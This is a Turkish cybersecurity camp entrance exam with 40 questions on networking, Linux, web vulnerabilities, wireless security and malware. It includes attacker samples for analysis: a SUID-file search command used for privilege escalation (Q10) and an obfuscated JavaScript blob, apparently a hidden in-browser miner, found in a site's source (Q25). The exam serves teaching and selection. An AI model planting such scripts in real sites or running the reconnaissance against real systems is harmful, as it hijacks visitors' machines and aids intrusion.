SlideShare uma empresa Scribd logo
1 de 17
SİBER GÜVENLİK
KIŞ KAMPI’18
SORULARI
Yazar:BGA BilgiGüvenliğiAKADEMİSİ
Baskı:2017/12
[SİBER GÜVENLİK KIŞ KAMPI’18 SINAV SORULARI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
Giriş
BGA Bilgi Güvenliği AKADEMİSİ, “Siber Güvenlik” konusunda kariyer yapmak ve bu konuda
uzmanlaşmak isteyen üniversite öğrencilerini, Siber Güvenlik Kamp’larına davet ediyor.
Ülkemizde Siber Güvenlik ile ilgili nitelikli eleman yetiştirme potansiyeli sadece %1
seviyesindedir. Bu alandaki insan kaynağı eksikliğini gidermek ve ülkemizin Ulusal Siber
Güvenlik vizyonunu tamamlanmasına destek olmak amacı ile Bilgi Güvenliği AKADEMİSİ
tarafından Siber Güvenlik Kamp’ları düzenlenmektedir.
Siber güvenlik alanında teknik çalışmalar yürüten, üretmeyi ve projeler geliştirmeyi hedefleyen
Bilgi Güvenliği AKADEMİSİ, sosyal sorumluluk projesi olarak gerçekleştirdiği Siber Güvenlik
Kamp’ları ile bu alanda uzman yetiştirmeyi ve sektör katkı sağlamayı amaçlamaktadır.
Bu alandaki insan gücü ihtiyacını karşılamak ve sektöre deneyimli, uzman personeller
yetiştirmek amacı ile gerçekleştirilen Siber Güvenlik Kamplar’ına katılmaya hak kazanan
öğrencilerin tüm masrafları, Bilgi Güvenliği AKADEMİSİ ve sponsor firmalar tarafından
karşılanacaktır.
Siber Güvenlik Kampı’na katılacak olan öğrenciler, Bilgi Güvenliği AKADEMİSİ’nin tecrübeli
eğitmenleri ve sektörün önde gelen Siber Güvenlik Uzmanları’ndan 7 gün süreyle özel eğitim
alma fırsatı yakalayacaklardır.
Hacking, zafiyet tarama, zararlı yazılım analizi, mobil güvenlik, DDOS saldırılarına karşı doğru
savunma gibi birçok konuda eğitim alacak olan Siber Güvenlik Kampı öğrencileri, eğitici ve
öğretici CTF yarışmaları sayesinde takım çalışması yeteneklerini de arttıracak ve öğrenmiş
oldukları bilgileri pekiştirebileceklerdir.
Siber Güvenlik Kış Kampı’na katılıma hak kazanan öğrenciler, bilgi güvenliği alanında deneyim
sahibi akademisyenler, kamu ve özel sektör yöneticileri ile de bir araya gelerek bu alanındaki
kariyer fırsatları konusunda da bilgi sahibi olacaklar.
“Gerçekleştirmiş olduğumuz Siber Güvenlik Kamp’larına bugüne kadar 20.000’den fazla
başvuru yapıldı. Bu başvurularda ise 250’den fazla öğrenci Siber Güvenlik uzmanlarımız
tarafından yetiştirildi ve sektöre kazandırıldı”
Siber Güvenlik Kış Kampı’na üniversitelerin Ön Lisans, Lisans, Yüksek Lisans veya Doktora
programlarında öğrenimleri devam eden kişiler kabul edilecektir.
Kampa katılmaya hak kazanan öğrencilerin konaklama, yeme, içme, eğitim ve diğer giderleri
Bilgi Güvenliği AKADEMİSİ ve sponsor firmalar tarafından karşılanacaktır.
Kamp, başvurular ve sorularınız ile ilgili daha fazla bilgi almakiçin SiberKamp.org adresini
ziyaret edebilir, eğitmen ve destekleyen firmalar hakkında bilgi edinebilirsiniz.
[SİBER GÜVENLİK KIŞ KAMPI’18 SINAV SORULARI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
SORULAR
SORU 1: Bir web sayfasının içeriği saldırganlar tarafından değiştirildiğinde aşağıdaki "bilgi
güvenliği" kriterinden hangisi zarar görmüş olur?
A) Gizlilik
B) Bütünlük
C) Kullanılabilirlik
D) İnkâr Edilemezlik
E) Hiçbiri
SORU 2: Analiz için almış olduğumuz bir ağ trafiği dosyası incelenirken içerisinde
NTFiM3JfNnV2RW5sMWtfazE1X2s0bVAxXzIwMTg= şeklinde bir bilgi tespit edilmiştir. Bu
veri ne anlama gelmektedir?
CEVAP: …………………………..
SORU 3: Saldırgan, kurban olarak belirlediği bir kişiye özel mesaj üzerinden
http://k.url/s6k4mP1 şeklinde kısaltılmış bir link göndermektedir. Kurban bu linki açtığında
karşısına bir pop-up mesajı çıkmaktadır. Bu noktada saldırgan aşağıdaki yöntemlerden
hangisini veya hangilerini kullandığı söylenebilir?
A) SQL Injection
B) ARP Poisining
C) ICMP Redirect
D) Stored XSS
E) Insecure Direct Object Reference(IDOR)
F) ICMP Redirect
G) Brute Force
H) HTTP Flood
I) Dom tabanlı XSS
J) Reflected XSS
SORU 4: TCP RST bayrağı ne işe yarar?
A) Bağlantı başlatmak için kullanılır.
B) Bağlantı sonrası oturum doğrulamak için kullanılır.
C) Bağlantıyı tamamen sonlandırmak için kullanılır.
D) Bağlantıdaki paketin öncelikli olduğunu belirtmek için kullanılır.
E) TCP’nin üçlü el sıkışmasını başarıyla tamamlamak için kullanılır.
[SİBER GÜVENLİK KIŞ KAMPI’18 SINAV SORULARI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
SORU 5: ICMP, OSI modeline göre hangi katmanda çalışır?
A) 4
B) 3-2
C) 3
D) 5
E) 2
SORU 6: Aşağıdaki servislerden hangileri TCP kullanır?
1. DHCP
2. SMTP
3. HTTP
4. TFTP
5. FTP
A) 1 ve 2
B) 2, 3 ve 5
C) 1, 2 ve 4
D) 1, 3 ve 5
E) 3 ve 5
SORU 7: OSI modelinin transport katmanı TCP/IP modelinde hangi katmana karşılık
gelmektedir?
A) Application
B) Host-to-Host
C) Internet
D) Network Access
E) Data Link
SORU 8: 2048 tane cihazın (kullanıcının) bulunduğu bir ağ yapınız mevcut. IP yapılandırmaları
ile ilgili olarak IP adresini, alt ağ maskesini, varsayılan gateway’i ve DNS sunucusuna ait
bilgileri otomatik olarak dağıtmanız isteniyor. Bunu gerçekleştirmek için aşağıdaki
protokollerden hangisini veya hangilerini kullanırsınız?
A) SMTP
B) SNMP
C) ARP
D) RARP
E) DHCP
[SİBER GÜVENLİK KIŞ KAMPI’18 SINAV SORULARI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
SORU 9: Linux tabanlı bir sistem üzerinde aşağıdaki gibi bir durum mevcuttur.
-r-------- 1 root root 56112 May 2 2017 /bin/chmod
---------- 1 user user 92189 Jan 17 2017 /home/user/questions.txt
Yukarıdaki duruma göre questions.txt dosyasının içini okumak isteyen root kullanıcısı
aşağıdakilerden hangisini yapabilir?
A) vi ya da nano kullanarak dosyayı açmalı.
B) questions.txt dosyasına okuma izni vererek dosyayı açmalı.
C) Dosya user kullanıcısına ait olduğundan root bunu okuyamaz.
D) chmod'u yeniden yükleyip, dosyaya okuma izni vererek okumalı.
E) questions.txt dosyası artık okunamaz olduğundan çöp dosya olmuştur.
SORU 10: Saldırgan bir Linux sunucuya saldırı gerçekleştirmiştir. Analiz esnasında çalıştırılan
komutlar arasında yukarıdaki gibi bir komut tespit edilmiştir. Bu komut ile saldırgan ne
yapmak istiyor olabilir?
find / ( -perm -u+s -or -perm -g+s ) -type f -exec ls -l {} ;
A) Kernel versiyonuna ait zafiyetleri bulmak.
B) Shell oluşturmak için yazma izni olan dizinleri bulmak.
C) root grubuna dahil kullanıcıları bulmak.
D) root izinlerinin mevcut olduğu dizinleri bulmak
E) root izinlerini kullanabileceği komutları bulmak
[SİBER GÜVENLİK KIŞ KAMPI’18 SINAV SORULARI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
SORU 11: Log analizi gerçekleştirirken bir web sunucusunda aşağıdaki kayıtlara rastlanmıştır.
Buna göre aşağıdakilerden hangisi ya da hangileri doğrudur?
A) Brute force saldırı yapılmıştır.
B) Saldırı başarılı olarak sonuçlanmıştır.
C) Saldırı başarısız olmuştur.
D) Saldırıyı gerçekleştiren sistem gatewaydir.
E) Saldırı veritabanına yapılmıştır.
F) Saldırı web sunucusunun 16020 portuna yapılmıştır.
G) Bu saldırı kullanıcıların sunucu üzerindeki web sitesini ziyaret etmesini
engellemektedir.
SORU 12: Bir Linux sistem üzerinde aşağıdaki komutları çalıştıran kişi ne yapmayı amaçlar?
iptables -A INPUT -p icmp -m icmp --icmp-type address-mask-request -j DROP
iptables -A INPUT -p icmp -m icmp --icmp-type timestamp-request -j DROP
iptables -A INPUT -p icmp -m icmp -m limit --limit 1/second -j ACCEPT
A) ICMP paketlerine cevap verilmesini engelliyordur.
B) SYN flood saldırısını engelliyordur.
C) Peer-to-Peer Attack’ı engelliyordur.
D) Smurf Attack’ı engelliyordur.
E) Slowloris saldırısını engelliyordur.
SORU 13: Bir Linux sistem üzerinde aşağıdaki komutu çalıştıran kişi ne yapmayı amaçlar?
ssh 192.168.7.13 "sudo /usr/sbin/tcpdump -s0 -w - 'port 80'" | wireshark -k -i -
CEVAP: …………………..
[SİBER GÜVENLİK KIŞ KAMPI’18 SINAV SORULARI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
SORU 14: Windows sistemlerde DNS çözümleme sırası nasıl gerçekleşmektedir?
i) Wins
ii) DNS Cache
iii) LmHosts Dosyası
iv) NetBIOS Name Cache
v) Hosts Dosyası
vi) Broadcast
vii) DNS
A) iv-ii-v-vii-vi-i-iii
B) ii-v-vii-iv-i-vi-iii
C) v-vii-iii-ii-vi-i-iv
D) vii-v-ii-iii-i-vi-iv
E) iii-ii-v-vii-vi-i-iv
SORU 15: Aşağıdakilerden hangisi ya da hangileri DHCP Discover mesajını tanımlar?
1. 2. Katman yayını olarak FF:FF:FF:FF:FF:FF kullanılması
2. UDP protokolü kullanılması
3. TCP protokolü kullanılması
4. 2. katman yayını olarak adres kullanmaması
A) Yalnız 1
B) Yalnız 2
C) 1 ve 2
D) 3 ve 4
E) Yalnız 4
[SİBER GÜVENLİK KIŞ KAMPI’18 SINAV SORULARI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
SORU 16: Bir saldırgan sonradan dahil olduğu bir kafenin ağında gözüne bir kurban
kestirmiştir. Kurbana bir saldırı düzenleyerek yukarıdaki grafikte gösterilen sonucu elde
etmiştir. Buna göre saldırgan aşağıdaki saldırılardan hangisini gerçekleştirmiş olabilir?
A) ARP Poisining
B) SQL Injection
C) Error Based XSS
D) ARP Spoofing
E) ICMP Redirect
F) DHCP Mangling
G) Smurf Saldırısı
H) IP Spoofing
I) SYN Flood
J) DHCP Session Clicking
K) IP Redirect
SORU 17: ICMP paketleri ile ilgili olarak aşağıdakilerden hangisi ya da hangileri doğrudur?
1. Bir TCP segmentinin alındığını onaylarlar.
2. Bir datagram alındığını onaylarlar.
3. Cihazlara ağ sorunları hakkında bilgi sağlarlar.
4. IP datagramları içerisinde kapsüllenirler.
A) Yalnız 1
B) Yalnız 3
C) 1 ve 2
D) 3 ve 4
E) Hepsi
[SİBER GÜVENLİK KIŞ KAMPI’18 SINAV SORULARI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
SORU 18: Aşağıdakilerden hangisi bir router’ın bir uzak bilgisayara yönelik ARP isteğine yanıt
vermesini sağlar?
A) Gateway DP
B) Reverse ARP (RARP)
C) Proxy ARP
D) Inverse ARP (IARP)
E) Hiçbiri
SORU 19: KRACK zafiyeti ile ilgili olarak aşağıdaki ifadelerden hangisi ya da hangileri
doğrudur?
A) Kablosuz ağın parolasını bulmak için kullanılır.
B) WPA-TKIP kullanılarak saldırı önlenebilir.
C) AES-CCMP kullanmak saldırıyı önlemez.
D) WPA1 bu saldırıdan etkilenir; ancak WPA2 etkilenmez.
E) Saldırıyı hafifletmek için 802.11r özelliği devre dışı bırakılabilir.
F) Kablosuz ağ cihazının WPS özelliğini kapatmak saldırıyı önleyebilir.
G) Bu saldırı kablosuz ağın PSK bilgilerini bilmeden ağ trafiğini görüntülemeyi sağlar.
SORU 20: Aşağıdakilerden hangisi en güçlü kablosuz sinyal şifrelemesi sunar?
A) WAP
B) WEP
C) WPA
D) WINS
E) WIN
SORU 21: WPA2 için güvenlik standardı aşağıdakilerden hangisidir?
A) 802.11ad
B) 802.11i
C) 802.11n
D) 802.11a
E) 802.11b
[SİBER GÜVENLİK KIŞ KAMPI’18 SINAV SORULARI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
SORU 22: Aşağıdaki kodun barındırdığı zafiyet nedir?
A) SQL Injection
B) Dom based XSS
C) Stored XSS
D) File Inclusion
E) Command Injection
SORU 23: Aşağıdaki kodun barındırdığı zafiyet nedir?
A) CSRF (Cross-Site Request Forgery)
B) SQL Injection
C) Command Injection
D) Reflected XSS
E) IDOR (Insecure Direct Object Reference)
[SİBER GÜVENLİK KIŞ KAMPI’18 SINAV SORULARI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
SORU 24: Aşağıdaki kod parçacığını inceleyen bir siber güvenlik uzmanı aynı zamanda web
loglarını da incelediğinde bol miktarda…
GET /index.php?file=index.php HTTP/1.0
GET /index.php?file=index.php HTTP/1.0
GET /index.php?file=index.php HTTP/1.0
…loglarını görmektedir. Bu saldırıya ne ad verilmektedir?
A) SQL injection
B) Cross-Site Request Forgery
C) Reflected XSS
D) Denial of Service
E) Directory Traversal
[SİBER GÜVENLİK KIŞ KAMPI’18 SINAV SORULARI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
SORU 25: Web sitesi oldukça fazla ziyaret edilen bir blogger, web sitesinin kaynak kodunu
incelediğinde aşağıdaki kodun bulunduğunu fark etmiştir. Bu kod ne ifade eder?
$=~[];$={___:++$,$$$$:(![]+"")[$],__$:++$,$_$_:(![]+"")[$],_$_:++$,$_$$:({}+"")[$],$$_$:($[$]
+"")[$],_$$:++$,$$$_:(!""+"")[$],$__:++$,$_$:++$,$$__:({}+"")[$],$$_:++$,$$$:++$,$___:++$,
$__$:++$};$.$_=($.$_=$+"")[$.$_$]+($._$=$.$_[$.__$])+($.$$=($.$+"")[$.__$])+((!$)+"")[$._$
$]+($.__=$.$_[$.$$_])+($.$=(!""+"")[$.__$])+($._=(!""+"")[$._$_])+$.$_[$.$_$]+$.__+$._$+$.
$;$.$$=$.$+(!""+"")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+"""+""
+$.__$+$.$$_+$.$$_+$.$_$_+""+$.__$+$.$$_+$._$_+""+$.$__+$.___+""+$.__$+$.$_$+
$.$_$+""+$.__$+$.$_$+$.__$+""+$.__$+$.$_$+$.$$_+$.$$$_+""+$.__$+$.$$_+$._$_+"
"+$.$__+$.___+"="+$.$__+$.___+""+$.__$+$.$_$+$.$$_+$.$$$_+""+$.__$+$.$$_+$.
$$$+""+$.$__+$.___+""+$.__$+$.___+$._$$+$._$+""+$.__$+$.$_$+$.__$+""+$.__$+
$.$_$+$.$$_+""+$.__$+$.__$+$.___+""+$.__$+$.$_$+$.__$+""+$.__$+$.$$_+$.$$_+$.
$$$_+"."+$.__$+$.___+$.__$+""+$.__$+$.$_$+$.$$_+$._$+""+$.__$+$.$_$+$.$$_+""
+$.__$+$.$$$+$.__$+""+$.__$+$.$_$+$.$_$+$._$+$._+""+$.__$+$.$$_+$._$$+"('"+$._
_$+$.$_$+$._$$+""+$.__$+$.$_$+$.__$+""+$.__$+$.$_$+$.$$_+""+$.__$+$.$__+$.$$$
+"_"+$._$+$.$$$$+"_"+$.__+""+$.__$+$.$_$+$.___+$.$$$_+"_"+$.__$+$.$_$+$.$_$+"
"+$.__$+$.$_$+$.__$+""+$.__$+$.$_$+$.$$_+$.$$$_+""+$.__$+$.$$_+$._$_+""+$.__$
+$.$$_+$._$$+"',"+$.$__+$.___+"{"+$.__$+$.$_$+$.$_$+""+$.__$+$.$_$+$.__$+""+$
.__$+$.$_$+$.$$_+$.$$$_+""+$.__$+$.$$_+$._$_+"."+$.__$+$.$$_+$._$$+$.__+$.$_$_+
""+$.__$+$.$$_+$._$_+$.__+"();}"+""")())();
A) Başka bir siteye ddos saldırısı yapmak istemektedir.
B) Siteye giren kullanıcılara zararlı yazılım indirterek botnet ağı kurmaktadır.
C) Siteye giren kullanıcıların işlem gücünü kullanarak mining(madencilik) yapmaktadır.
D) Siteye giren kullanıcıların kimlik bilgilerini çalmaktadır.
E) Siteyi başka bir adrese yönlendirmektedir.
SORU 26: Bir sisteme sızan iki saldırgan arasındaki konuşmalarda aşağıdaki gibi şifreli bir
mesaj geçmektedir. Bu mesajın ne anlama geldiğini açıklayınız.
77774442233777552672288777733663323266232
CEVAP: …………………………..
[SİBER GÜVENLİK KIŞ KAMPI’18 SINAV SORULARI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
SORU 27: Bir bankanın saldırı almasından sonra yetkililer kredi kartı bilgilerinin sızdırılmış
olabileceğinden şüpheleniyor. Gerçekleştirilen analiz işlemlerinden sonra çok sayıda wav
dosyasının sızdırıldığını tespit ettik. Sizce bu ses kaydı ne anlama gelmektedir?
[sample.wav]
İndir; https://files.fm/u/7utccbbt
CEVAP: …………………………………..
SORU 28: Aşağıdaki lokasyona gitmek için gizli bir bayrak ekledik. Bayrağı bulabilir misiniz?
CEVAP: ………………………………
SORU 29: Aşağıdaki uygulamayı çalıştırdık ancak bayrağı bulamıyoruz. Bulabilir misin?
[Sample.elf]
İndir; https://files.fm/u/4ybbhh77
CEVAP: ……………………………
[SİBER GÜVENLİK KIŞ KAMPI’18 SINAV SORULARI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
SORU 30: Ağ alt yapısında DMZ nereye kurulmalıdır?
A) İç ağ ile güvenlik duvarı arasına
B) İç ağa; ancak doğrudan güvenlik duvarına bağlı değil
C) Dış ağ ve güvenlik duvarı arasına
D) Güvenlik duvarının arkasında; ancak iç ağa doğrudan bağlı olmadan
E) Güvenlik duvarının önüne; ancak doğrudan iç ağa bağlı olarak
SORU 31: Saldırı tespit sisteminin iki türü nedir?
A) Anomaly and signature
B) Passive and active
C) Internal and external
D) Host and network
E) Dynamic and directly
SORU 32: Saldırı önleme sisteminin iki türü nedir?
A) Anomaly and signature
B) Passive and active
C) Internal and external
D) Host and network
E) Dynamic and directly
SORU 33: Aşağıdakilerden hangisi asimetrik anahtar şifrelemesi kullanmaktadır?
A) AES
B) PGP
C) 3DES
D) RC5
E) DES
SORU 34: OSI modelinin ağ katmanında çalışan güvenlik duvarlarının iki türü aşağıdakilerden
hangisidir?
A) Stateful and stateless
B) Dynamic and static
C) Anomaly and signature
D) Mandatory and discretionary
E) Passive and active
[SİBER GÜVENLİK KIŞ KAMPI’18 SINAV SORULARI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
SORU 35: Değerli bilgiler taşıyan bir sistem izole edilmiş bir ağ içerisinde sürekli olarak
izlenecek şekilde konumlandırılmıştır. Bu ne amaçla yapılan bir güvenlik tedbiridir?
A) Pseudo-network
B) Honeypot
C) Virtual Network
D) Canary Trap
E) VPN
SORU 36: Rol tabanlı erişim denetim listelerinin iki türü aşağıdakilerden hangisidir?
A) Mandatory and discretionary
B) Object and permission
C) Filesystem and networking
D) Dynamic and static
E) Passive and active
SORU 37: Aşağıdakilerden hangisi Pseudo/Virtual dosya sistemleri arasında yer almaz?
A) Devfs
B) Debugfs
C) Tmpfs
D) Ext3
E) Winfs
SORU: 38: Hangisi bir zararlıyı diske yazıldığı anda tespit edebilen bir AV yeteneğidir.
A) In-Memory Scan
B) On-Demand
C) On-Access
D) Heuristic Engine
E) Static Analysis
SORU 39: Hangisi, Zararlıların istismar aşamasına geçtiklerinde kullandıkları ve yıkıcı etkiye
sahip varlıklarına verilen addır.
A) Shellcode
B) Payload
C) Pseudo-Code
D) Opcode
E) Hexcode
[SİBER GÜVENLİK KIŞ KAMPI’18 SINAV SORULARI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
SORU 40: Hangisi bir güvenlik çözümüne yakalanmadan, exploitin/zararlının hedefine
ulaşmasına yol açan tekniklere verilen isimdir.
A) Bypass
B) Injection
C) Massive Attack
D) Blinding
E) Evasion
SINAV SÜRESİ: 3 Saat
Sınavımız tamamlandı. Detaylı bilgi için siberkamp@bga.com.tr adresimiz ile iletişime
geçebilirsiniz.
[SİBER GÜVENLİK KIŞ KAMPI’18 SINAV SORULARI]
BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity
BGA Bilgi Güvenliği A.Ş. Hakkında
BGA Bilgi Güvenliği A.Ş. 2008 yılından bu yana siber güvenlik alanında faaliyet göstermektedir.
Ülkemizdeki bilgi güvenliği sektörüne profesyonel anlamda destek olmak amacı ile kurulan BGA Bilgi
Güvenliği, stratejik siber güvenlik danışmanlığı ve güvenlik eğitimleri konularında kurumlara hizmet
vermektedir.
Uluslararası geçerliliğe sahip sertifikalı 50 kişilik teknik ekibi ile, faaliyetlerini Ankara ve İstanbul ve
USA’da sürdüren BGA Bilgi Güvenliği’nin ilgi alanlarını “Sızma Testleri, Güvenlik Denetimi, SOME, SOC
Danışmanlığı, Açık Kaynak Siber Güvenlik Çözümleri, Büyük Veri Güvenlik Analizi ve Yeni Nesil Güvenlik
Çözümleri” oluşturmaktadır.
Gerçekleştirdiği başarılı danışmanlık projeleri ve eğitimlerle sektörde saygın bir yer edinen BGA Bilgi
Güvenliği, kurulduğu günden bugüne alanında lider finans, enerji, telekom ve kamu kuruluşlarına
1.000'den fazla eğitim ve danışmanlık projeleri gerçekleştirmiştir.
BGA Bilgi Güvenliği, kurulduğu 2008 yılından beri ülkemizde bilgi güvenliği konusundaki bilgi ve
paylaşımların artması amacı ile güvenlik e-posta listeleri oluşturulması, seminerler, güvenlik etkinlikleri
düzenlenmesi, üniversite öğrencilerine kariyer ve bilgi sağlamak için siber güvenlik kampları
düzenlenmesi ve sosyal sorumluluk projeleri gibi birçok konuda gönüllü faaliyetlerde bulunmuştur.
BGA Bilgi Güvenliği AKADEMİSİ Hakkında
BGA Bilgi Güvenliği A.Ş.’nin eğitim ve sosyal sorumluluk markası olarak çalışan Bilgi Güvenliği
AKADEMİSİ, siber güvenlik konusunda ticari, gönüllü eğitimlerin düzenlenmesi ve siber güvenlik
farkındalığını arttırıcı gönüllü faaliyetleri yürütülmesinden sorumludur. Bilgi Güvenliği AKADEMİSİ
markasıyla bugüne kadar “Siber Güvenlik Kampları”, “Siber Güvenlik Staj Okulu”, “Siber Güvenlik Ar-
Ge Destek Bursu”, “Ethical Hacking yarışmaları” ve “Siber Güvenlik Kütüphanesi” gibi birçok gönüllü
faaliyetin destekleyici olmuştur.

Mais conteúdo relacionado

Mais procurados

Zafiyet tespiti ve sizma yöntemleri
Zafiyet tespiti ve sizma yöntemleriZafiyet tespiti ve sizma yöntemleri
Zafiyet tespiti ve sizma yöntemleriEPICROUTERS
 
BGA CTF Ethical Hacking Yarışması Çözümleri
BGA CTF Ethical Hacking Yarışması ÇözümleriBGA CTF Ethical Hacking Yarışması Çözümleri
BGA CTF Ethical Hacking Yarışması ÇözümleriBGA Cyber Security
 
Uygulamalı Ağ Güvenliği Eğitimi Lab Çalışmaları
Uygulamalı Ağ Güvenliği Eğitimi Lab ÇalışmalarıUygulamalı Ağ Güvenliği Eğitimi Lab Çalışmaları
Uygulamalı Ağ Güvenliği Eğitimi Lab ÇalışmalarıBGA Cyber Security
 
Hacklenmiş Windows Sistem Analizi
Hacklenmiş Windows Sistem AnaliziHacklenmiş Windows Sistem Analizi
Hacklenmiş Windows Sistem AnaliziBGA Cyber Security
 
Windows Ağlarda Saldırı Tespiti
Windows Ağlarda Saldırı TespitiWindows Ağlarda Saldırı Tespiti
Windows Ağlarda Saldırı TespitiSparta Bilişim
 
Adli Bilişim ve Adli Bilişim Araçları
Adli Bilişim ve Adli Bilişim AraçlarıAdli Bilişim ve Adli Bilişim Araçları
Adli Bilişim ve Adli Bilişim AraçlarıAhmet Gürel
 
Mitre ATT&CK Kullanarak Etkin Saldırı Tespiti
Mitre ATT&CK Kullanarak Etkin Saldırı TespitiMitre ATT&CK Kullanarak Etkin Saldırı Tespiti
Mitre ATT&CK Kullanarak Etkin Saldırı TespitiBGA Cyber Security
 
PORT TARAMA ve KEŞİF ÇALIŞMALARI
PORT TARAMA ve KEŞİF ÇALIŞMALARI PORT TARAMA ve KEŞİF ÇALIŞMALARI
PORT TARAMA ve KEŞİF ÇALIŞMALARI BGA Cyber Security
 
Pentest Çalışmalarında Kablosuz Ağ Güvenlik Testleri
Pentest Çalışmalarında Kablosuz Ağ Güvenlik TestleriPentest Çalışmalarında Kablosuz Ağ Güvenlik Testleri
Pentest Çalışmalarında Kablosuz Ağ Güvenlik TestleriBGA Cyber Security
 
İleri Seviye Ağ Güvenliği Lab Kitabı
İleri Seviye Ağ Güvenliği Lab Kitabıİleri Seviye Ağ Güvenliği Lab Kitabı
İleri Seviye Ağ Güvenliği Lab KitabıBGA Cyber Security
 
Tatil Öncesi Güvenlik Kontrol Listesi.pdf
Tatil Öncesi Güvenlik Kontrol Listesi.pdfTatil Öncesi Güvenlik Kontrol Listesi.pdf
Tatil Öncesi Güvenlik Kontrol Listesi.pdfBGA Cyber Security
 
Hacklenmiş Web Sunucu Analizi
Hacklenmiş Web Sunucu AnaliziHacklenmiş Web Sunucu Analizi
Hacklenmiş Web Sunucu AnaliziBGA Cyber Security
 
Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 1, 2, 3
Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 1, 2, 3Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 1, 2, 3
Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 1, 2, 3BGA Cyber Security
 
NetsecTR "Her Yönüyle Siber Tehdit İstihbaratı"
NetsecTR "Her Yönüyle Siber Tehdit İstihbaratı"NetsecTR "Her Yönüyle Siber Tehdit İstihbaratı"
NetsecTR "Her Yönüyle Siber Tehdit İstihbaratı"BGA Cyber Security
 
Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 4, 5, 6
Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 4, 5, 6Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 4, 5, 6
Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 4, 5, 6BGA Cyber Security
 
Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 10, 11, 12
Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 10, 11, 12Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 10, 11, 12
Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 10, 11, 12BGA Cyber Security
 
Zararlı Yazılım Tespiti ve Siber i̇stihbarat Amaçlı IOC Kullanımı
Zararlı Yazılım Tespiti ve Siber i̇stihbarat Amaçlı IOC KullanımıZararlı Yazılım Tespiti ve Siber i̇stihbarat Amaçlı IOC Kullanımı
Zararlı Yazılım Tespiti ve Siber i̇stihbarat Amaçlı IOC KullanımıBGA Cyber Security
 
GÜVENLİ YAZILIM GELİŞTİRME EĞİTİMİ İÇERİĞİ
GÜVENLİ YAZILIM GELİŞTİRME EĞİTİMİ İÇERİĞİGÜVENLİ YAZILIM GELİŞTİRME EĞİTİMİ İÇERİĞİ
GÜVENLİ YAZILIM GELİŞTİRME EĞİTİMİ İÇERİĞİBGA Cyber Security
 
Penetrasyon Testlerinde Açık Kod Yazılımların Kullanımı
Penetrasyon Testlerinde Açık Kod Yazılımların KullanımıPenetrasyon Testlerinde Açık Kod Yazılımların Kullanımı
Penetrasyon Testlerinde Açık Kod Yazılımların KullanımıBGA Cyber Security
 

Mais procurados (20)

Zafiyet tespiti ve sizma yöntemleri
Zafiyet tespiti ve sizma yöntemleriZafiyet tespiti ve sizma yöntemleri
Zafiyet tespiti ve sizma yöntemleri
 
BGA CTF Ethical Hacking Yarışması Çözümleri
BGA CTF Ethical Hacking Yarışması ÇözümleriBGA CTF Ethical Hacking Yarışması Çözümleri
BGA CTF Ethical Hacking Yarışması Çözümleri
 
Uygulamalı Ağ Güvenliği Eğitimi Lab Çalışmaları
Uygulamalı Ağ Güvenliği Eğitimi Lab ÇalışmalarıUygulamalı Ağ Güvenliği Eğitimi Lab Çalışmaları
Uygulamalı Ağ Güvenliği Eğitimi Lab Çalışmaları
 
Hacklenmiş Windows Sistem Analizi
Hacklenmiş Windows Sistem AnaliziHacklenmiş Windows Sistem Analizi
Hacklenmiş Windows Sistem Analizi
 
Windows Ağlarda Saldırı Tespiti
Windows Ağlarda Saldırı TespitiWindows Ağlarda Saldırı Tespiti
Windows Ağlarda Saldırı Tespiti
 
Adli Bilişim ve Adli Bilişim Araçları
Adli Bilişim ve Adli Bilişim AraçlarıAdli Bilişim ve Adli Bilişim Araçları
Adli Bilişim ve Adli Bilişim Araçları
 
Open Source SOC Kurulumu
Open Source SOC KurulumuOpen Source SOC Kurulumu
Open Source SOC Kurulumu
 
Mitre ATT&CK Kullanarak Etkin Saldırı Tespiti
Mitre ATT&CK Kullanarak Etkin Saldırı TespitiMitre ATT&CK Kullanarak Etkin Saldırı Tespiti
Mitre ATT&CK Kullanarak Etkin Saldırı Tespiti
 
PORT TARAMA ve KEŞİF ÇALIŞMALARI
PORT TARAMA ve KEŞİF ÇALIŞMALARI PORT TARAMA ve KEŞİF ÇALIŞMALARI
PORT TARAMA ve KEŞİF ÇALIŞMALARI
 
Pentest Çalışmalarında Kablosuz Ağ Güvenlik Testleri
Pentest Çalışmalarında Kablosuz Ağ Güvenlik TestleriPentest Çalışmalarında Kablosuz Ağ Güvenlik Testleri
Pentest Çalışmalarında Kablosuz Ağ Güvenlik Testleri
 
İleri Seviye Ağ Güvenliği Lab Kitabı
İleri Seviye Ağ Güvenliği Lab Kitabıİleri Seviye Ağ Güvenliği Lab Kitabı
İleri Seviye Ağ Güvenliği Lab Kitabı
 
